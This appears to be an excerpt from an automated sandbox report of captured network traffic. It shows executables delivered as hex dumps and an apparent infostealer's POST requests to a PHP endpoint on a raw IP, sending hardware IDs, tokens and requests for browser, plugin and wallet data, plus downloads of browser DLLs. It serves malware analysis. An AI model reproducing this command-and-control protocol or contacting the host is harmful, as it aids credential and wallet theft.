00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 13 Oct 2024 15:46:18 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 13 Oct 2024 15:46:20 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 13 Oct 2024 15:46:21 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJKKJKEHDBGIDGDHCFHIHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4a 4b 45 48 44 42 47 49 44 47 44 48 43 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 39 44 38 37 35 46 32 42 32 31 35 33 32 35 36 34 35 30 37 36 35 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4a 4b 45 48 44 42 47 49 44 47 44 48 43 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4a 4b 45 48 44 42 47 49 44 47 44 48 43 46 48 49 2d 2d 0d 0a Data Ascii: ------KJKKJKEHDBGIDGDHCFHIContent-Disposition: form-data; name="hwid"D9D875F2B2153256450765------KJKKJKEHDBGIDGDHCFHIContent-Disposition: form-data; name="build"doma------KJKKJKEHDBGIDGDHCFHI--
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDAEHCFHJJJJECAAFBKJHost: 185.215.113.37Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 41 45 48 43 46 48 4a 4a 4a 4a 45 43 41 41 46 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 30 35 37 39 63 35 36 31 30 65 35 61 38 31 32 33 38 38 30 64 30 64 62 61 30 66 37 65 61 34 32 31 64 66 30 35 64 35 32 39 62 34 33 32 65 61 32 61 61 34 61 61 30 32 66 64 39 38 62 64 38 36 64 66 39 61 37 64 66 63 30 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 45 48 43 46 48 4a 4a 4a 4a 45 43 41 41 46 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 45 48 43 46 48 4a 4a 4a 4a 45 43 41 41 46 42 4b 4a 2d 2d 0d 0a Data Ascii: ------IDAEHCFHJJJJECAAFBKJContent-Disposition: form-data; name="token"70579c5610e5a8123880d0dba0f7ea421df05d529b432ea2aa4aa02fd98bd86df9a7dfc0------IDAEHCFHJJJJECAAFBKJContent-Disposition: form-data; name="message"browsers------IDAEHCFHJJJJECAAFBKJ--
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFIIIJJKJKFHIDGDBAKJHost: 185.215.113.37Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 46 49 49 49 4a 4a 4b 4a 4b 46 48 49 44 47 44 42 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 30 35 37 39 63 35 36 31 30 65 35 61 38 31 32 33 38 38 30 64 30 64 62 61 30 66 37 65 61 34 32 31 64 66 30 35 64 35 32 39 62 34 33 32 65 61 32 61 61 34 61 61 30 32 66 64 39 38 62 64 38 36 64 66 39 61 37 64 66 63 30 0d 0a 2d 2d 2d 2d 2d 2d 43 46 49 49 49 4a 4a 4b 4a 4b 46 48 49 44 47 44 42 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 43 46 49 49 49 4a 4a 4b 4a 4b 46 48 49 44 47 44 42 41 4b 4a 2d 2d 0d 0a Data Ascii: ------CFIIIJJKJKFHIDGDBAKJContent-Disposition: form-data; name="token"70579c5610e5a8123880d0dba0f7ea421df05d529b432ea2aa4aa02fd98bd86df9a7dfc0------CFIIIJJKJKFHIDGDBAKJContent-Disposition: form-data; name="message"plugins------CFIIIJJKJKFHIDGDBAKJ--
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECGHJJEHDHCAAKFIIDGIHost: 185.215.113.37Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 47 48 4a 4a 45 48 44 48 43 41 41 4b 46 49 49 44 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 30 35 37 39 63 35 36 31 30 65 35 61 38 31 32 33 38 38 30 64 30 64 62 61 30 66 37 65 61 34 32 31 64 66 30 35 64 35 32 39 62 34 33 32 65 61 32 61 61 34 61 61 30 32 66 64 39 38 62 64 38 36 64 66 39 61 37 64 66 63 30 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 48 4a 4a 45 48 44 48 43 41 41 4b 46 49 49 44 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 48 4a 4a 45 48 44 48 43 41 41 4b 46 49 49 44 47 49 2d 2d 0d 0a Data Ascii: ------ECGHJJEHDHCAAKFIIDGIContent-Disposition: form-data; name="token"70579c5610e5a8123880d0dba0f7ea421df05d529b432ea2aa4aa02fd98bd86df9a7dfc0------ECGHJJEHDHCAAKFIIDGIContent-Disposition: form-data; name="message"fplugins------ECGHJJEHDHCAAKFIIDGI--
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KEHJKJDGCGDAKFHIDBGCHost: 185.215.113.37Content-Length: 6067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/sqlite3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IEHCBAFIDAECBGCBFHJEHost: 185.215.113.37Content-Length: 4599Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHJKJDGCGDAKFHIDBGCBHost: 185.215.113.37Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBGCAFIIECBFIDHIJKFBHost: 185.215.113.37Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 30 35 37 39 63 35 36 31 30 65 35 61 38 31 32 33 38 38 30 64 30 64 62 61 30 66 37 65 61 34 32 31 64 66 30 35 64 35 32 39 62 34 33 32 65 61 32 61 61 34 61 61 30 32 66 64 39 38 62 64 38 36 64 66 39 61 37 64 66 63 30 0d 0a 2d 2d 2d 2d 2d 2d 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 42 2d 2d 0d 0a Data Ascii: ------CBGCAFIIECBFIDHIJKFBContent-Disposition: form-data; name="token"70579c5610e5a8123880d0dba0f7ea421df05d529b432ea2aa4aa02fd98bd86df9a7dfc0------CBGCAFIIECBFIDHIJKFBContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------CBGCAFIIECBFIDHIJKFBContent-Disposition: form-data; name="file"------CBGCAFIIECBFIDHIJKFB--
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCFIIIJJKJKFHIDGDBAKHost: 185.215.113.37Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 43 46 49 49 49 4a 4a 4b 4a 4b 46 48 49 44 47 44 42 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 30 35 37 39 63 35 36 31 30 65 35 61 38 31 32 33 38 38 30 64 30 64 62 61 30 66 37 65 61 34 32 31 64 66 30 35 64 35 32 39 62 34 33 32 65 61 32 61 61 34 61 61 30 32 66 64 39 38 62 64 38 36 64 66 39 61 37 64 66 63 30 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 49 49 49 4a 4a 4b 4a 4b 46 48 49 44 47 44 42 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 49 49 49 4a 4a 4b 4a 4b 46 48 49 44 47 44 42 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 49 49 49 4a 4a 4b 4a 4b 46 48 49 44 47 44 42 41 4b 2d 2d 0d 0a Data Ascii: ------HCFIIIJJKJKFHIDGDBAKContent-Disposition: form-data; name="token"70579c5610e5a8123880d0dba0f7ea421df05d529b432ea2aa4aa02fd98bd86df9a7dfc0------HCFIIIJJKJKFHIDGDBAKContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------HCFIIIJJKJKFHIDGDBAKContent-Disposition: form-data; name="file"------HCFIIIJJKJKFHIDGDBAK--
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/freebl3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/mozglue.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/msvcp140.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/nss3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/softokn3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/vcruntime140.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGIJDGCAEBFIIECAKFHIHost: 185.215.113.37Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGIJEGHDAECAKECAFCAKHost: 185.215.113.37Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 47 49 4a 45 47 48 44 41 45 43 41 4b 45 43 41 46 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 30 35 37 39 63 35 36 31 30 65 35 61 38 31 32 33 38 38 30 64 30 64 62 61 30 66 37 65 61 34 32 31 64 66 30 35 64 35 32 39 62 34 33 32 65 61 32 61 61 34 61 61 30 32 66 64 39 38 62 64 38 36 64 66 39 61 37 64 66 63 30 0d 0a 2d 2d 2d 2d 2d 2d 44 47 49 4a 45 47 48 44 41 45 43 41 4b 45 43 41 46 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 44 47 49 4a 45 47 48 44 41 45 43 41 4b 45 43 41 46 43 41 4b 2d 2d 0d 0a Data Ascii: ------DGIJEGHDAECAKECAFCAKContent-Disposition: form-data; name="token"70579c5610e5a8123880d0dba0f7ea421df05d529b432ea2aa4aa02fd98bd86df9a7dfc0------DGIJEGHDAECAKECAFCAKContent-Disposition: form-data; name="message"wallets------DGIJEGHDAECAKECAFCAK--
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGHDAKKJJJKJKECBGCGDHost: 185.215.113.37Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 47 48 44 41 4b 4b 4a 4a 4a 4b 4a 4b 45 43 42 47 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 30 35 37 39 63 35 36 31 30 65 35 61 38 31 32 33 38 38 30 64 30 64 62 61 30 66 37 65 61 34 32 31 64 66 30 35 64 35 32 39 62 34 33 32 65 61 32 61 61 34 61 61 30 32 66 64 39 38 62 64 38 36 64 66 39 61 37 64 66 63 30 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 44 41 4b 4b 4a 4a 4a 4b 4a 4b 45 43 42 47 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 